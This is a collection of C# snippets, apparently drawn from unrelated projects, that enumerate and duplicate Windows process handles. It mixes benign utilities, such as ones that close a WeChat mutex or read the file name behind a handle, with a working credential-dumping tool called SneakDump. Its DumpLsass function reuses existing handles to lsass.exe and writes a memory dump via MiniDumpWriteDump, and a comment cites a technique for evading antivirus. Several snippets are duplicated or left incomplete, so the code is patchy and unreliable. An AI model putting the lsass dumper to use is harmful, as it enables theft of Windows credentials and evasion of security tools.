private static List<SYSTEM_HANDLE_INFORMATION> GetHandles(Process process) { uint nStatus; int nHandleInfoSize = 0x10000; IntPtr ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize); int nLength = 0; IntPtr ipHandle = IntPtr.Zero; while ((nStatus = NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ipHandlePointer, nHandleInfoSize, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { nHandleInfoSize = nLength; Marshal.FreeHGlobal(ipHandlePointer); ipHandlePointer = Marshal.AllocHGlobal(nLength); } byte[] baTemp = new byte[nLength]; CopyMemory(baTemp, ipHandlePointer, (uint)nLength); long lHandleCount = 0; if (Is64Bits()) { lHandleCount = Marshal.ReadInt64(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8); } else { lHandleCount = Marshal.ReadInt32(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4); } SYSTEM_HANDLE_INFORMATION shHandle; List<SYSTEM_HANDLE_INFORMATION> lstHandles = new List<SYSTEM_HANDLE_INFORMATION>(); for (long lIndex = 0; lIndex < lHandleCount; lIndex++) { shHandle = new SYSTEM_HANDLE_INFORMATION(); if (Is64Bits()) { shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8); } else { ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle)); shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); } if (shHandle.ProcessID != process.Id) continue; lstHandles.Add(shHandle); } return lstHandles; }
public static void FindAndCloseWeChatMutexHandle(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process) { IntPtr ipHandle = IntPtr.Zero; IntPtr openProcessHandle = IntPtr.Zero; IntPtr hObjectName = IntPtr.Zero; try { PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead; openProcessHandle = OpenProcess(flags, false, process.Id); // 通过 DuplicateHandle 访问句柄 if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return; } int nLength = 0; hObjectName = Marshal.AllocHGlobal(256 * 1024); // 查询句柄名称 while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(hObjectName); if (nLength == 0) { Console.WriteLine("Length returned at zero!"); return; } hObjectName = Marshal.AllocHGlobal(nLength); } OBJECT_NAME_INFORMATION objObjectName = new OBJECT_NAME_INFORMATION(); objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(hObjectName, objObjectName.GetType()); if (objObjectName.Name.Buffer != IntPtr.Zero) { string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer); Console.WriteLine(strObjectName); // \Sessions\1\BaseNamedObjects\_WeChat_App_Instance_Identity_Mutex_Name if (strObjectName.Contains("_Instance_Identity_Mutex_Name")) { // 通过 DuplicateHandle DUPLICATE_CLOSE_SOURCE 关闭句柄 IntPtr mHandle = IntPtr.Zero; if (DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out mHandle, 0, false, DUPLICATE_CLOSE_SOURCE)) { CloseHandle(mHandle); } } } } catch (Exception ex) { Console.WriteLine(ex.Message); } finally { Marshal.FreeHGlobal(hObjectName); CloseHandle(ipHandle); CloseHandle(openProcessHandle); } }
public static string getFileByProcessHandle(SYSTEM_HANDLE_INFORMATION handleInfo, IntPtr hProcess) { try { IntPtr thisProcess = Process.GetCurrentProcess().Handle; IntPtr handle; //duplicate the handle DuplicateHandle(hProcess, new IntPtr(handleInfo.HandleValue), thisProcess, out handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS); //setup bufffer to store unicode string int bufferSize = 0x200; //512 bytes //Allocate unmanaged memory to store name IntPtr pFileNameBuffer = Marshal.AllocHGlobal(bufferSize); IO_STATUS_BLOCK ioStat = new IO_STATUS_BLOCK(); NtQueryInformationFile(handle, ref ioStat, pFileNameBuffer, bufferSize, FILE_INFORMATION_CLASS.FileNameInformation); //close the handle CloseHandle(handle); //always do this when duplicating handles // offset = 4 int offset = 4; long pBaseAddress = pFileNameBuffer.ToInt64(); } }
/// <summary> /// Queries for name of handle. /// </summary> /// <param name="targetHandleInfo">The handle info.</param> /// <param name="hProcess">Open handle to the process which owns that handle.</param> /// <returns></returns> private static string GetHandleName(SYSTEM_HANDLE_INFORMATION targetHandleInfo, IntPtr hProcess) { //skip special NamedPipe handle (this may cause hang up with NtQueryObject function) if (targetHandleInfo.AccessMask.ToInt64() == 0x0012019F) { return(String.Empty); } IntPtr thisProcess = Process.GetCurrentProcess().Handle; IntPtr handle; // Need to duplicate handle in this process to be able to access name DuplicateHandle(hProcess, new IntPtr(targetHandleInfo.HandleValue), thisProcess, out handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS); // Setup buffer to store unicode string int bufferSize = GetHandleNameLength(handle); // Allocate unmanaged memory to store name IntPtr pStringBuffer = Marshal.AllocHGlobal(bufferSize); // Query to fill string buffer with name NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, pStringBuffer, bufferSize, out bufferSize); // Close this handle CloseHandle(handle); //super important... almost missed this // Do the conversion to managed type string handleName = ConvertToString(pStringBuffer); // Release Marshal.FreeHGlobal(pStringBuffer); return(handleName); }
public static void DumpLsass(SYSTEM_HANDLE_INFORMATION handleInfo, string FileName) { // Code for getting handles was found here https://stackoverflow.com/questions/54872228/c-sharp-how-to-find-all-handles-associated-with-current-process // idea for getting existing handles to dump lsass found here https://skelsec.medium.com/duping-av-with-handles-537ef985eb03 IntPtr ipHandle = IntPtr.Zero; IntPtr openProcessHandle = IntPtr.Zero; IntPtr hObjectName = IntPtr.Zero; PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead; openProcessHandle = OpenProcess(flags, false, (int)handleInfo.ProcessID); bool test = DuplicateHandle(openProcessHandle, new IntPtr(handleInfo.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS); int pLength = 0; hObjectName = Marshal.AllocHGlobal(256 * 1024); while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectTypeInformation, hObjectName, pLength, ref pLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(hObjectName); if (pLength == 0) { Console.WriteLine("Length returned at zero!"); } hObjectName = Marshal.AllocHGlobal(pLength); } OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName); if (objObjectName.Name.Buffer != IntPtr.Zero) { string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer); if (strObjectName == "Process") { int max = 1024; StringBuilder str = new StringBuilder(max); QueryFullProcessImageName(ipHandle, 0, str, ref max); if (str.ToString().Contains("lsass.exe")) { Console.WriteLine("[+] Found open handle to lass: " + ipHandle); FileStream dumpFile = new FileStream(FileName, FileMode.Create); Console.WriteLine("[+] Attempting to dump lsass with handle..."); bool dumped = MiniDumpWriteDump(ipHandle, handleInfo.ProcessID, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); dumpFile.Close(); if (dumped == true) { Console.WriteLine("[+] Dumped lsass"); System.Environment.Exit(1); } } } } }
private static List <SYSTEM_HANDLE_INFORMATION> GetHandles(Process process) { uint nStatus; int nHandleInfoSize = 0x10000; IntPtr ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize); int nLength = 0; IntPtr ipHandle = IntPtr.Zero; while ((nStatus = NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ipHandlePointer, nHandleInfoSize, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { nHandleInfoSize = nLength; Marshal.FreeHGlobal(ipHandlePointer); ipHandlePointer = Marshal.AllocHGlobal(nLength); } byte[] baTemp = new byte[nLength]; CopyMemory(baTemp, ipHandlePointer, (uint)nLength); long lHandleCount = 0; if (Is64Bits()) { lHandleCount = Marshal.ReadInt64(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8); } else { lHandleCount = Marshal.ReadInt32(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4); } SYSTEM_HANDLE_INFORMATION shHandle; List <SYSTEM_HANDLE_INFORMATION> lstHandles = new List <SYSTEM_HANDLE_INFORMATION>(); for (long lIndex = 0; lIndex < lHandleCount; lIndex++) { shHandle = new SYSTEM_HANDLE_INFORMATION(); if (Is64Bits()) { shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8); } else { ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle)); shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); } if (shHandle.ProcessID != process.Id) { continue; } lstHandles.Add(shHandle); } return(lstHandles); }
public static string GetObjectTypeName(SYSTEM_HANDLE_INFORMATION shHandle, Process process) { IntPtr m_ipProcessHwnd = OpenProcess(ProcessAccessFlags.All, false, process.Id); var objBasic = new OBJECT_BASIC_INFORMATION(); var objObjectType = new OBJECT_TYPE_INFORMATION(); int nLength = 0; if (!DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, GetCurrentProcess(), out IntPtr ipHandle, 0, false, 0x2)) { return(null); } IntPtr ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic)); NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation, ipBasic, Marshal.SizeOf(objBasic), ref nLength); objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType()); Marshal.FreeHGlobal(ipBasic); IntPtr ipObjectType = Marshal.AllocHGlobal(objBasic.TypeInformationLength); nLength = objBasic.TypeInformationLength; while ((uint)(_ = NtQueryObject( ipHandle, (int)ObjectInformationClass.ObjectTypeInformation, ipObjectType, nLength, ref nLength)) == 0xC0000004) { Marshal.FreeHGlobal(ipObjectType); ipObjectType = Marshal.AllocHGlobal(nLength); } objObjectType = (OBJECT_TYPE_INFORMATION)Marshal.PtrToStructure(ipObjectType, objObjectType.GetType()); IntPtr ipTemp; if (Is64Bits()) { ipTemp = new IntPtr(Convert.ToInt64(objObjectType.Name.Buffer.ToString(), 10) >> 32); } else { ipTemp = objObjectType.Name.Buffer; } string strObjectTypeName = Marshal.PtrToStringUni(ipTemp, objObjectType.Name.Length >> 1); Marshal.FreeHGlobal(ipObjectType); return(strObjectTypeName); }
private static IEnumerable <SYSTEM_HANDLE_INFORMATION> GetHandles() { List <SYSTEM_HANDLE_INFORMATION> aHandles = new List <SYSTEM_HANDLE_INFORMATION>(); int handle_info_size = Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION()) * 20000; //Allocate enough memory to hold 200000 handles IntPtr ptrHandleData = IntPtr.Zero; try { ptrHandleData = Marshal.AllocHGlobal(handle_info_size); int nLength = 0; //Keep testing handle info lengths until you find out how much memory to allocate to hold all handles while (NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ptrHandleData, handle_info_size, ref nLength) == STATUS_INFO_LENGTH_MISMATCH) { handle_info_size = nLength; Marshal.FreeHGlobal(ptrHandleData); ptrHandleData = Marshal.AllocHGlobal(nLength); } //Now that we know how much data to store, actually store the data long handle_count = Marshal.ReadIntPtr(ptrHandleData).ToInt64(); IntPtr ptrHandleItem = ptrHandleData + Marshal.SizeOf(ptrHandleData); //Go through all the handles to extract individual information for each for (long lIndex = 0; lIndex < handle_count; lIndex++) { //Put the information for a handle into the struct SYSTEM_HANDLE_INFORMATION SYSTEM_HANDLE_INFORMATION oSystemHandleInfo = Marshal.PtrToStructure <SYSTEM_HANDLE_INFORMATION>(ptrHandleItem); //Move to next handle ptrHandleItem += Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION()); //Only care about this if you want to filter handles releveant to a specific process ID //if (oSystemHandleInfo.ProcessID != 8988) { continue; } //Add the handle info to the list of handles aHandles.Add(oSystemHandleInfo); } } catch (Exception ex) { throw ex; } finally { //Avoid memory leaks by freeing up managed memory Marshal.FreeHGlobal(ptrHandleData); } return(aHandles); }
private static string GetFilePath(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process) { IntPtr ipHandle = IntPtr.Zero; IntPtr openProcessHandle = IntPtr.Zero; IntPtr hObjectName = IntPtr.Zero; try { PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead; openProcessHandle = OpenProcess(flags, false, process.Id); if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return(null); } if (GetFileType(ipHandle) != FileType.FileTypeDisk) { return(null); } int nLength = 0; hObjectName = Marshal.AllocHGlobal(256 * 1024); while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(hObjectName); if (nLength == 0) { Console.WriteLine("Length returned at zero!"); return(null); } hObjectName = Marshal.AllocHGlobal(nLength); } OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName); if (objObjectName.Name.Buffer != IntPtr.Zero) { string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer); return(GetRegularFileNameFromDevice(strObjectName)); } } catch (Exception ex) { Console.WriteLine(ex.Message); } finally { Marshal.FreeHGlobal(hObjectName); CloseHandle(ipHandle); CloseHandle(openProcessHandle); } return(null); }
public static string getObjectTypeName(SYSTEM_HANDLE_INFORMATION shHandle, Process process) { var m_ipProcessHwnd = Native.OpenProcess((int)ProcessAccessFlags.All, false, process.Id); var ipHandle = IntPtr.Zero; var objBasic = new OBJECT_BASIC_INFORMATION(); var ipBasic = IntPtr.Zero; var objObjectType = new OBJECT_TYPE_INFORMATION(); var ipObjectType = IntPtr.Zero; var ipObjectName = IntPtr.Zero; var strObjectTypeName = ""; var nLength = 0; var nReturn = 0; var ipTemp = IntPtr.Zero; if (!Native.DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, Native.GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return(null); } ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic)); Native.NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation, ipBasic, Marshal.SizeOf(objBasic), ref nLength); objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType()); Marshal.FreeHGlobal(ipBasic); ipObjectType = Marshal.AllocHGlobal(objBasic.TypeInformationLength); nLength = objBasic.TypeInformationLength; while ((uint)(nReturn = Native.NtQueryObject( ipHandle, (int)ObjectInformationClass.ObjectTypeInformation, ipObjectType, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(ipObjectType); ipObjectType = Marshal.AllocHGlobal(nLength); } objObjectType = (OBJECT_TYPE_INFORMATION)Marshal.PtrToStructure(ipObjectType, objObjectType.GetType()); ipTemp = Is64Bits() ? new IntPtr(Convert.ToInt64(objObjectType.Name.Buffer.ToString(), 10) >> 32) : objObjectType.Name.Buffer; strObjectTypeName = Marshal.PtrToStringUni(ipTemp, objObjectType.Name.Length >> 1); Marshal.FreeHGlobal(ipObjectType); return(strObjectTypeName); }
/// <summary> /// Queries for file name associated with handle. /// </summary> /// <param name="handleInfo">The handle info.</param> /// <param name="hProcess">Open handle to the process which owns that handle.</param> /// <returns></returns> private static string GetFileName(SYSTEM_HANDLE_INFORMATION handleInfo, IntPtr hProcess) { try { IntPtr thisProcess = Process.GetCurrentProcess().Handle; IntPtr handle; // Need to duplicate handle in this process to be able to access name DuplicateHandle(hProcess, new IntPtr(handleInfo.HandleValue), thisProcess, out handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS); // Setup buffer to store unicode string int bufferSize = 0x200; //512 bytes // Allocate unmanaged memory to store name IntPtr pFileNameBuffer = Marshal.AllocHGlobal(bufferSize); IO_STATUS_BLOCK ioStat = new IO_STATUS_BLOCK(); NtQueryInformationFile(handle, ref ioStat, pFileNameBuffer, bufferSize, FILE_INFORMATION_CLASS.FileNameInformation); // Close this handle CloseHandle(handle); //super important... almost missed this // offset=4 seems to work... int offset = 4; long pBaseAddress = pFileNameBuffer.ToInt64(); // Do the conversion to managed type string fileName = Marshal.PtrToStringUni(new IntPtr(pBaseAddress + offset)); // Release Marshal.FreeHGlobal(pFileNameBuffer); return(fileName); } catch (Exception e) // logged { Log.Error($"Unable to retrieve filename from process.", e); // is it really a good thing to return an empty string here // when the operation we just did failed? Why not letting // the user process handle the exception? Just saying... return(string.Empty); } }
public static List <SYSTEM_HANDLE_INFORMATION> GetHandles(Process process) { List <SYSTEM_HANDLE_INFORMATION> aHandles = new List <SYSTEM_HANDLE_INFORMATION>(); int handle_info_size = Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION()) * 20000; IntPtr ptrHandleData = IntPtr.Zero; try { ptrHandleData = Marshal.AllocHGlobal(handle_info_size); int nLength = 0; while (NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ptrHandleData, handle_info_size, ref nLength) == STATUS_INFO_LENGTH_MISMATCH) { handle_info_size = nLength; Marshal.FreeHGlobal(ptrHandleData); ptrHandleData = Marshal.AllocHGlobal(nLength); } long handle_count = Marshal.ReadIntPtr(ptrHandleData).ToInt64(); IntPtr ptrHandleItem = ptrHandleData + Marshal.SizeOf(ptrHandleData); for (long lIndex = 0; lIndex < handle_count; lIndex++) { SYSTEM_HANDLE_INFORMATION oSystemHandleInfo = new SYSTEM_HANDLE_INFORMATION(); oSystemHandleInfo = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ptrHandleItem, oSystemHandleInfo.GetType()); ptrHandleItem += Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION()); if (oSystemHandleInfo.ProcessID != process.Id) { continue; } aHandles.Add(oSystemHandleInfo); } } catch (Exception ex) { throw ex; } finally { Marshal.FreeHGlobal(ptrHandleData); } return(aHandles); }
public static void Main(string[] args) { if (args.Length < 1) { Console.WriteLine("USAGE: SneakDump.exe <path to dump file>"); System.Environment.Exit(0); } string FileName = args[0]; int outPriv = 0; List <SYSTEM_HANDLE_INFORMATION> aHandles = new List <SYSTEM_HANDLE_INFORMATION>(); int handle_info_size = Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION()) * 20000; IntPtr ptrHandleData = IntPtr.Zero; List <IntPtr> lsassHandles = new List <IntPtr>(); //try //{ ptrHandleData = Marshal.AllocHGlobal(handle_info_size); int nLength = 0; while (NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ptrHandleData, handle_info_size, ref nLength) == STATUS_INFO_LENGTH_MISMATCH) { handle_info_size = nLength; Marshal.FreeHGlobal(ptrHandleData); ptrHandleData = Marshal.AllocHGlobal(nLength); } long handle_count = Marshal.ReadIntPtr(ptrHandleData).ToInt64(); IntPtr ptrHandleItem = ptrHandleData + Marshal.SizeOf(ptrHandleData); for (long lIndex = 0; lIndex < handle_count; lIndex++) { SYSTEM_HANDLE_INFORMATION oSystemHandleInfo = Marshal.PtrToStructure <SYSTEM_HANDLE_INFORMATION>(ptrHandleItem); ptrHandleItem += Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION()); if (oSystemHandleInfo.ProcessID == 4) { continue; } DumpLsass(oSystemHandleInfo, FileName); } }
/// <summary> /// Queries for file name associated with handle. /// </summary> /// <param name="handleInfo">The handle info.</param> /// <param name="hProcess">Open handle to the process which owns that handle.</param> /// <returns></returns> private static string GetFileName(SYSTEM_HANDLE_INFORMATION handleInfo, IntPtr hProcess) { try { IntPtr thisProcess = Process.GetCurrentProcess().Handle; IntPtr handle; // Need to duplicate handle in this process to be able to access name DuplicateHandle(hProcess, new IntPtr(handleInfo.HandleValue), thisProcess, out handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS); // Setup buffer to store unicode string int bufferSize = 0x200; //512 bytes // Allocate unmanaged memory to store name IntPtr pFileNameBuffer = Marshal.AllocHGlobal(bufferSize); IO_STATUS_BLOCK ioStat = new IO_STATUS_BLOCK(); NtQueryInformationFile(handle, ref ioStat, pFileNameBuffer, bufferSize, FILE_INFORMATION_CLASS.FileNameInformation); // Close this handle CloseHandle(handle); //super important... almost missed this // offset=4 seems to work... int offset = 4; long pBaseAddress = pFileNameBuffer.ToInt64(); // Do the conversion to managed type string fileName = Marshal.PtrToStringUni(new IntPtr(pBaseAddress + offset)); // Release Marshal.FreeHGlobal(pFileNameBuffer); return fileName; } catch (Exception) { return string.Empty; } }
public static void CloseHandles() { var processes = Process.GetProcessesByName("cg_se_3000"); var nHandleInfoSize = 0x10000; var ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize); var nLength = 0; var ipHandle = IntPtr.Zero; while (NtQuerySystemInformation(16, ipHandlePointer, nHandleInfoSize, ref nLength) == 0xc0000004) { nHandleInfoSize = nLength; Marshal.FreeHGlobal(ipHandlePointer); ipHandlePointer = Marshal.AllocHGlobal(nLength); } var baTemp = new byte[nLength]; Marshal.Copy(ipHandlePointer, baTemp, 0, nLength); long lHandleCount = 0; if (Is64Bits()) { lHandleCount = Marshal.ReadInt64(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8); } else { lHandleCount = Marshal.ReadInt32(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4); } for (long lIndex = 0; lIndex < lHandleCount; lIndex++) { var shHandle = new SYSTEM_HANDLE_INFORMATION(); if (Is64Bits()) { shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8); } else { ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle)); shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); } if (shHandle.ObjectTypeNumber != 17) { continue; } var process = processes.FirstOrDefault(p => p.Id == shHandle.ProcessID); if (process == null) { continue; } var name = GetObjectName(shHandle, process); if (name != null && name.Contains("LREso")) { Console.WriteLine(@"Close " + name); DuplicateHandle(process.Handle, shHandle.Handle, IntPtr.Zero, out var h, 0, false, DUPLICATE_CLOSE_SOURCE); CloseHandle(h); } } }
public static string GetObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process) { IntPtr m_ipProcessHwnd = OpenProcess(ProcessAccessFlags.All, false, process.Id); IntPtr ipHandle = IntPtr.Zero; var objBasic = new OBJECT_BASIC_INFORMATION(); IntPtr ipBasic = IntPtr.Zero; var objObjectName = new OBJECT_NAME_INFORMATION(); IntPtr ipObjectName = IntPtr.Zero; string strObjectName = ""; int nLength = 0; int nReturn = 0; IntPtr ipTemp = IntPtr.Zero; if (!DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return(null); } ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic)); NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation, ipBasic, Marshal.SizeOf(objBasic), ref nLength); objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType()); Marshal.FreeHGlobal(ipBasic); nLength = objBasic.NameInformationLength; ipObjectName = Marshal.AllocHGlobal(nLength); while ((uint)(nReturn = NtQueryObject( ipHandle, (int)ObjectInformationClass.ObjectNameInformation, ipObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(ipObjectName); ipObjectName = Marshal.AllocHGlobal(nLength); } objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType()); if (Is64Bits()) { ipTemp = ipObjectName + 16; } else { ipTemp = objObjectName.Name.Buffer; } if (ipTemp != IntPtr.Zero) { var baTemp2 = new byte[nLength]; try { Marshal.Copy(ipTemp, baTemp2, 0, nLength); strObjectName = Marshal.PtrToStringUni(ipTemp); //strObjectName = Encoding.Unicode.GetString (baTemp2); return(strObjectName); } catch (AccessViolationException) { return(null); } finally { Marshal.FreeHGlobal(ipObjectName); CloseHandle(ipHandle); } } return(null); }
public static string getObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process) { var m_ipProcessHwnd = Native.OpenProcess((int)ProcessAccessFlags.All, false, process.Id); var ipHandle = IntPtr.Zero; var objBasic = new OBJECT_BASIC_INFORMATION(); var ipBasic = IntPtr.Zero; var ipObjectType = IntPtr.Zero; var objObjectName = new OBJECT_NAME_INFORMATION(); var ipObjectName = IntPtr.Zero; var nLength = 0; var nReturn = 0; var ipTemp = IntPtr.Zero; if (!Native.DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, Native.GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return(null); } ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic)); Native.NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation, ipBasic, Marshal.SizeOf(objBasic), ref nLength); objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType()); Marshal.FreeHGlobal(ipBasic); nLength = objBasic.NameInformationLength; ipObjectName = Marshal.AllocHGlobal(nLength); while ((uint)(nReturn = Native.NtQueryObject( ipHandle, (int)ObjectInformationClass.ObjectNameInformation, ipObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(ipObjectName); ipObjectName = Marshal.AllocHGlobal(nLength); } objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType()); ipTemp = Is64Bits() ? new IntPtr(Convert.ToInt64(objObjectName.Name.Buffer.ToString(), 10) >> 32) : objObjectName.Name.Buffer; if (ipTemp != IntPtr.Zero) { var baTemp2 = new byte[nLength]; try { Marshal.Copy(ipTemp, baTemp2, 0, nLength); var strObjectName = Marshal.PtrToStringUni(Is64Bits() ? new IntPtr(ipTemp.ToInt64()) : new IntPtr(ipTemp.ToInt32())); return(strObjectName); } catch (AccessViolationException) { Console.WriteLine("[WARNING] Access violation!"); return(null); } finally { Marshal.FreeHGlobal(ipObjectName); Native.CloseHandle(ipHandle); } } return(null); }
public NhaamaHandle[] GetHandles() { var handles = new List <NhaamaHandle>(); var nHandleInfoSize = 0x10000; var ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize); var nLength = 0; IntPtr ipHandle; while ((NtDll.NtQuerySystemInformation(SYSTEM_INFORMATION_CLASS.SystemHandleInformation, ipHandlePointer, nHandleInfoSize, ref nLength)) == NtStatus.InfoLengthMismatch) { nHandleInfoSize = nLength; Marshal.FreeHGlobal(ipHandlePointer); ipHandlePointer = Marshal.AllocHGlobal(nLength); } byte[] baTemp = new byte[nLength]; Marshal.Copy(ipHandlePointer, baTemp, 0, nLength); long lHandleCount; if (Is64BitProcess()) { lHandleCount = Marshal.ReadInt64(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8); } else { lHandleCount = Marshal.ReadInt32(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4); } SYSTEM_HANDLE_INFORMATION shHandle; List <SYSTEM_HANDLE_INFORMATION> test = new List <SYSTEM_HANDLE_INFORMATION>(); for (long lIndex = 0; lIndex < lHandleCount; lIndex++) { shHandle = new SYSTEM_HANDLE_INFORMATION(); if (Is64BitProcess()) { shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8); } else { ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle)); shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); } if (shHandle.ProcessID != BaseProcess.Id) { continue; } try { test.Add(shHandle); } catch { // ignored } } foreach (var systemHandleInformation in test) { try { handles.Add(new NhaamaHandle(new IntPtr(systemHandleInformation.Handle), this)); } catch { //ignored } } return(handles.ToArray()); }
public static extern unsafe int ZwQuerySystemInformation(int SystemInformationClass, ref SYSTEM_HANDLE_INFORMATION SystemInformation, uint SystemInformationLength, ref uint ReturnLength);
